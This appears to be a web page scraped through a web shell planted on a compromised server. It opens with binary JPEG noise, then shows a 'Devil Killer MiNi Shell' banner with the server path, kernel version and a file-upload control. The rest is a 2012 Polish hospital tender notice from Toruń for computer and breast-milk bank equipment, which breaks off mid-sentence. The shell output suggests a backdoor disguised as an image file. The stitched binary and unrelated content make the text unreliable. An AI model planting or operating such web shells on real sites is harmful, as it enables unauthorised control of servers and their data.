JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/243337-N-2012.html

<p class="kh_header"><b>Toruń: Dostawa :
- zestawu komputerowego, skanera kodów, drukarki termotransferowej z systemem 
   znakowania  - Zadanie Nr 1<br>

- laktatora elektrycznego, podgrzewacza do strzykawek,  laboratoryjnej szafy dwukomorowej, analizatora składu mleka kobiecego, szafy mroźnej,  pasteryzatora  mleka kobiecego, komory  laminarnej, zmywarki, elektronicznej wagi noworodkowej -  Zadanie Nr 2</b><br>
<b>Numer ogłoszenia: 243337 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53-59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6101510, faks 56 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa :
- zestawu komputerowego, skanera kodów, drukarki termotransferowej z systemem 
   znakowania  - Zadanie Nr 1<br>

- laktatora elektrycznego, podgrzewacza do strzykawek,  laboratoryjnej szafy dwukomorowej, analizatora składu mleka kobiecego, szafy mroźnej,  pasteryzatora  mleka kobiecego, komory  laminarnej, zmywarki, elektronicznej wagi noworodkowej -  Zadanie Nr 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa :<br>

zadanie nr 1 <br>

1. zestaw komputerowy - 1 zestaw<br>

2.skaner kodow - 1 szt.<br>

3.drukarka termotransferowa z systemem znakowania próbek - 1 szt.<br>

specyfikacje techniczne <br>

I. zestaw komputerowy<br>

1.procesor min. 3.1 ghz, min. 3 mb cache <br>

2.pamięć operacyjna min. 4 gb (1x4096mb) 1333 mhz możliwość rozbudowy do min 8 gb,<br>

3.dysk twardy o pojemności min. 500 gb sata, 7200 obr.na min<br>

4.karta graficzna, niezintegrowana, pamięć min 512 mb<br>

5.wyposażenie multimedialne 
karta dźwiękowa zintegrowana z płytą główną
porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy.<br>

6.obudowa typu minitower, zasilacz o mocy max 265w i efektywności min. 90%<br>

7.bezpieczeństwo
komputer powinien posiadać etykietę inwentaryzacyjną umieszczoną przez producenta sprzętu, która będzie zawierać informacje:
informację o fizycznym  adresie karty sieciowej,
numerze ewidencyjnym produktu,
adresie strony www serwisu producenta<br>

8.monitor lcd przekątna ekranu min 19 cali<br>

9.zainstalowany system operacyjny windows 7 professional 64 bit pl + nośnik 
   zainstalowany pakiet microsoft office + nośnik
    wbudowane porty usb: min. 2 z przodu obudowy i 6 z tyłu, port sieciowy, porty słuchawek i mikrofonu na przednim panelu obudowy, z tyłu port mikrofonu oraz wejście i wyjście liniowe stereo. 
    karta sieciowa zintegrowana z płytą główną 
    klawiatura usb w układzie polskim programisty 
    mysz optyczna usb z trzema klawiszami oraz rolką (scroll) 
    nagrywarka dvd + -rw wraz z oprogramowaniem do nagrywania i odtwarzania płyt<br>

10.drukarka laserowa monochromatyczna
prędkość druku w czerni (tryb normal, a4): do 33 str. na min
wydruk pierwszej strony w czerni (a4, po wyjściu ze stanu gotowości): w ciągu 8 s 
(z trybu automatycznego wyłączenia/oczekiwania)
jakość druku w czerni (tryb best): do 1200 x 1200 dpi
technologia druku: druk laserowy
standardowa liczba podajników papieru: 2
druk dwustronny: automatyczny (standardowo)
obsługiwane formaty nośników: a4, a5, a6, b5
waga: dopuszczalny ciężar do 11 kg
obsługiwane systemy operacyjne: windows 7 (32- i 64-bitowy); windows vista (32- i 64-bitowy); 
microsoft windows xp (32-bitowy -64-bitowy), server 2003 (32-bitowy -64-bitowy), 2000; mac os x v10.5, 
v10.6, v10.7 unix, linux
w zestawie kabel<br>


II. skaner kodów - 1 szt. <br>

1.odczyt kodów 1d-2d-pdf417 złej jakości<br>

2.szybkość skanowania - większe lub równe 100 skanów/s<br>

3.zasięg odczytu - 0-70 cm<br>

4.uchwyt pistoletowy<br>

5.odporność na upadek - min. 1,50 m<br>

6.norma przemysłowa - ip41<br>

7.uszczelnienie zgodne z normą ip43, odporny na działanie środków odkażających<br>

8.tryby pracy: automatyczny i manualny<br>

9.multi-interfejs (możliwość wymiennego użycia intefejsów: kbw, rs232 lub usb)<br>

10.automatyczna identyfikacja i konfiguracja interfejsu podłączonego kabla<br>


III.drukarka termotransferowa z systemem znakowania próbek - 1 szt.<br>

1.pamięć - 512 kb flash, 128 kb sram<br>

2.język programowania - epl1, epl2<br>

3.drukowane kody kreskowe - ucc-ean, jan, upc, code 39, code 11, code 93, code 128,
fim postnet, pdf417, maxcode, code 49, codabar, interleaved 2 of 5, msi-plessey<br>


zadanie nr 2  <br>

1. laktator elektryczny - 2 szt.<br>

2.podgrzewacz do strzykawek - 1 szt.<br>

3.laboratoryjna szafa dwukomorowa - 1 szt.<br>

4.analizator składu mleka kobiecego - 1 szt.<br>

5.szafa mroźna - 1 szt.<br>

6.pasteryzator mleka kobiecego - 1 szt.<br>

7.komora laminarna - 1 szt.<br>

8.zmywarka - 1 szt.<br>

9.elektroniczna waga noworodkowa - 1 szt.<br>


specyfikacje techniczne <br>

I.laktator elektryczny - 2 szt.<br>

1.zasilanie 230v, 50hz<br>

2.3-fazowy cykl ssania naśladujący cykl ssania dziecka<br>

3.płynna regulacja siły ssania<br>

4.przystosowane do pracy ciągłej (24 h na dobę)<br>

5.cicha i bezwibracyjna praca (do 45db)<br>

6.waga do 2,5 kg<br>

7.obudowa zapewniająca utrzymanie urządzenia w czystości<br>

8.konstrukcja zabezpieczająca przed przedostaniem się mleka do środka modułu<br>

9.wszystkie elementy mające kontakt z mlekiem nadające się do autoklawowania<br>

10.wyposażony w osobiste końcówki sterylne z butelkami na mleko, gotowe do użytku po rozpakowaniu z rękawa<br>

11.gwarancja zapewnienia zakupu części zamiennych przez okres min. 10 lat.<br>

II.podgrzewacz do strzykawek - 1 szt.<br>

1.zasilanie 230-240v, 50na60 hz. <br>

2. podgrzewanie pokarmu matki do temperatu-ry min. 30stopni C +/- 4 stopnie C 
w suchym, gorącym powietrzu. <br>

3.dwie funkcje do wyboru: podgrzewanie i rozmrażanie <br>

4.pokarm może mieć różne temperatury początkowe: od +20stopni C do -20stopni C <br>

5.czas podgrzewania dostosowany do pojemności porcji <br>

6.sygnał dźwiękowy i wizualny informujący o zakończeniu procesu <br>

7.przystosowany do podgrzewania pokarmu kolekcjonowanego w pojemnikach o różnych pojemnościach  lub pokarmu umieszczonego w strzykawkach. <br>

III.laboratoryjna szafa dwukomorowa - 1 szt.<br>

1.ustawianie temperatury z dokładnością do 0,1stopni C<br>

2.dźwiękowy i optyczny alarm otwartych drzwi i podwyższonej lub niskiej temperatury<br>

3.pamięć min. i max. temperatury oraz braku zasilania; pamięć ostatnich trzech alarmów<br>

4.dodatkowy port dostępu dla zewnętrznego czujnika temperatury w każdej komorze urządzenia<br>

5.pojemność min. 350 l w tym:
chłodziarki min. 254 l
zamrażarki min. 107 l<br>

6.zakres temperatur
- chłodziarki - od +3stopni c do +8stopni c
- zamrażarki - od -9stopni c do -30stopni c<br>

7.zużycie energii max. 1,8 kwh na dobę<br>

8.dynamiczno-statyczny system chłodzenia<br>

9.metoda odszraniania:
- chłodziarka - automatyczny
- zamrażarka - manualny<br>

10.kolor obudowy i wnętrza do ustalenia z użytkownikiem<br>

11.samoczynne zamykanie drzwi<br>

12.sterowanie elektroniczne oddzielne dla chłodziarki i zamrażarki:
- 2 kompresory
- 2 panele sterowania
- 2 systemy alarmu otwartych drzwi oraz wysokiej temperatury
- 1 alarm przerwy w zasilaniu
- 1 interfejs rs 485/styk bezpotencjałowy
- 2 zamki<br>

13.wyposażenie chłodziarki: min. 4 ruszty pokryte tworzywem<br>

14.wyposażenie zamrażarki: min. 3 szuflady z transparentnym frontem<br>

15.klasa klimatyczna: sn-st (temperatura otoczenia od +10stopni c do +38stopni c<br>

16.czynnik chłodniczy R600a<br>

IV. analizator składu mleka kobiecego - 1 szt.<br>

1.pomiar składników mleka (tłuszczu, białka, laktozy, substancji suchych nie tłuszczowych, wartości energetycznej) za pomocą  spektroskopii  transmisji w podczerwieni) bez konieczności użycia chemikaliów<br>

2.objętość próbki od 1-3 ml w zakresie temperatur od 20stopni c do 40stopni c<br>

3.czas analizy maks. 60 sek.<br>

4.powtarzalność (sd) max. 0.05%<br>

5.zgodność pomiaru
 (sd) max. 0.1 %<br>

6.zasilanie  15 v, 4ADC<br>

7.port usb do pamięci zewnętrznej<br>

8.wewnętrzna pamięć - min. 4000 pomiarów<br>

9.system operacyjny - windows ce 5.0<br>


V.szafa mroźna - 1 szt.<br>

1.pojemność większa lub równa  300 l<br>

2.szerokość  użytkowa większa lub równa  40 cm<br>

3.głębokość użytkowa  większa lub równa  40 cm<br>

4.wysokość użytkowa większa lub równa 160 cm<br>

5.obudowa, drzwi i pokrywa stalowe; kolor do ustalenia z użytkownikiem<br>

6.drzwi przestawne z ergonomicznym uchwytem drążkowym z zamkiem na wyposażeniu<br>

7.wyposażenie zamrażarki:większa lub równa  8 szuflad z transparentnym frontem<br>

8.zużycie energii: mniejsza lub równa  1,309 kwh/dobę<br>

9.izolacja - min. 7 mm<br>

10.maksymalna waga szafy - 94 kg<br>

11.klasa klimatyczna sn-st (temperatura otoczenia od +10stopni c do +38stopni c)<br>

12.czynnik chłodniczy r600a<br>

13.zakres napięcia 220-250 v<br>

14.metoda odszraniania: ręczna<br>

15.zakres temperatury:  -9stopni c do -30stopni c<br>

16.zewnętrzny wskaźnik temperatury w komorze<br>

17.optyczny i akustyczny sygnał awarii<br>

VI. pasteryzator mleka kobiecego - 1 szt.<br>

1.pojemność  większa lub równa  3 l <br>

2.możliwość umieszczenia co najmniej12 butelek o poj. od 130 do 230 ml<br>

3.wykonanie w wersji nastołowej<br>

4.szybkie schładzanie do 4stopni c<br>

5.wymiary: 1100 x 600 x 450 +/-5%<br>

6.zasilanie: 230 v, 50 hz, 2400 w, 11 fla<br>

7.urządzenie zgodne z normami: en60204-1, en294: 1992, ac: 1993<br>

8.urządzenie posiadające ce: 89/292.eec, 91/368/eec, 93/44eec<br>

9.wykonanie ze stali nierdzewnej<br>

10.koszyk na butelki, oprogramowanie i czytnik w komplecie <br>

VII.komora laminarna - 1 szt.<br>

1.filtry: laminarny, pionowy  
filtr wstępny: poliamidowy klasy eu3 (g3) wg. normy pn-en 779
filtr główny: absolutny hepa en 1800, skuteczność filtracji min. 99,997% dla cząstek 0,3 ?m (żywotność filtra hepa min. 3000 h)<br>

2.dotykowy panel sterowania z osobnym włącznikiem trybu auto, oświetlenia i uv oraz regulacją nawiewu<br>

3.sterowanie mikroprocesorowe:
- tryb automatyczny -przedmuchanie, ustawienie przepływu, załączenie lampy jarzeniowej
- tryb ręczny - przepływ, lampa jarzeniowa, uv<br>

4.cyfrowy licznik czasu pracy oraz wewnętrzny system nadzoru informujący o błędach pracy<br>

5.wymiary maksymalne:
- szerokość - do 700 mm
- wysokość - do 780 mm
- głębokość - do 500 mm<br>

6.wyposażenie komory:
- lampa doświetlająca przestrzeń roboczą
- lampa bakteriobójcza uv
- gniazdo elektryczne na obudowie komory
- licznik czasu pracy komory oraz lampy uv
- blat roboczy ze stali nierdzewnej<br>

VIII.zmywarka  - 1 szt.<br>

1.klasa energetyczna - co najmniej A+<br>

2.ilość kompletów - min. 12<br>

3.maksymalne wymiary:
81,5x60x60<br>

4.zakres temperatury mycia: 35stopni c do 75stopni c<br>

5.funkcja wyparzania<br>

IX.elektroniczna waga noworodkowa 1 szt.<br>

1.dokładność pomiaru - min. 10 g 
klasa dokładności - co najmniej 3<br>

2.waga maksymalna dziecka - min. 15 kg<br>

3.zasilanie: akumulatorki i zasilacz (w zestawie)<br>

4.wymiary szalki: min. 500 x 270 mm<br>

5.wyświetlacz lcd <br>

6.funkcje tara, hold<br>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/  wykaz  wykonanych min. 2 dostaw sprzętu komputerowego dla Zadania Nr 1,
     a dla Zadania Nr 2 min.2 dostaw sprzętu medycznego o wartości min.  dla poszczególnych
     zadań:
Zadanie Nr 1 -    7.500,00zł
Zadanie Nr 2 -  37.500,00zł 
      brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;
Wykonawca składający ofertęna na obydwa zadania musi wykazać się zrealizowanymi 
min. 2 dostawami o wymaganej wartości łącznej równej sumie poszczególnych zadań. 

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	zgłoszenie/ powiadomienie  Prezesa Urzędu o wprowadzeniu do obrotu i do używania oferowanego wyrobu zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2010 r. Nr 107, poz. 679), deklarację  zgodności potwierdzającą, że wyrób jest zgodny z wymaganiami zasadniczymi -  dotyczy wyrobów medycznych

b)   deklarację zgodności CE dla oferowanego sprzętu komputerowego

c) aktualny certyfikat ISO dla producenta sprzętu komputerowego

d) prospekty/ katalogi oferowanego przedmiotu zamówienia potwierdzające spełnianie parametrów wymaganych przez Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/	oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;
b/ oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.
*Zobowiązania podmiotu trzeciego z art. 26 ust. 2b ustawy - Prawo zamówień publicznych należy złożyć w oryginale.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53-59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2012 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53-59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> *Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału
*Jeżeli Wykonawcy składają ofertę wspólną ( konsorcjum, spółka cywilna) wówczas
